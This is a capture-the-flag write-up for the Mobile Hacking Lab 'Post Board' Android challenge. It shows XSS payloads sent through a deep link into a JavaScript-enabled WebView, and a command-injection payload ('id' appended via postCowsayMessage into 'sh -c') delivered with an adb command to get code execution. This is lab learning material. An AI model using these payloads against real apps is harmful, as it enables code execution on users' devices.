Post Board
Hello everyone , In this blog post , I will try to explain my solution steps for Post Board challenge from Mobile Hacking Lab Platform . i hope it will be useful for you
After we install The APK then we open it its a message application with an input field
image.png Let’s Examine the AndroidManifest.xml we found that activity
com.mobilehackinglab.postboard.MainActivity
, it’s an exported activityhave a data schema with scheme=
postboard
and android:host=postmessage
with a categoryBROWSABLE
let’s analysis this main activity code :
First thing we find is
setupView()
that have :setJavaScriptEnabled(**true**)
path that load the url
file:///android_asset/index.html
the second thing is
handleIntent()
Verifies if the intent’s URI scheme is
postboard
and the host ispostmessage
.Decodes a Base64-encoded path in the URI, escapes certain characters, and passes it to JavaScript via
WebAppInterface.postMarkdownMessage
to display it on the home page.
Let’s try to test our input :
First payload is
<h1>kero</h1>
⇒ already successthe second payload is
<img src=x onerror=alert(1)>
⇒ success
when we analysis the
WebAppInterface
class we found this FuncpostCowsayMessage()
it execute the
cowsay
script located atCowsayUtil.scriptPath
passing the message arg as
{"bin/sh", "-c", CowsayUtil.scriptPath + ' ' + message}
it use a shell , then call the message + script path
may be we can call the
postCowsayMessage
and then passwhoami
as acowsayMessage
then it will be passed to
runCowsay
and then exec it by :my payload is
<img src=x onerror=WebAppInterface.postCowsayMessage("Kero0x1_is_here;id")>
let’s encode it and put it with adb
adb shell am start -n "com.mobilehackinglab.postboard/.MainActivity" -a "android.intent.action.VIEW" -d "postboard://postmessage/
PGltZyBzcmM9eCBvbmVycm9yPVdlYkFwcEludGVyZmFjZS5wb3N0Q293c2F5TWVzc2FnZSgiS2VybzB4MV9pc19oZXJlO2lkIik+"
and here we success and already get rce 😉
Last updated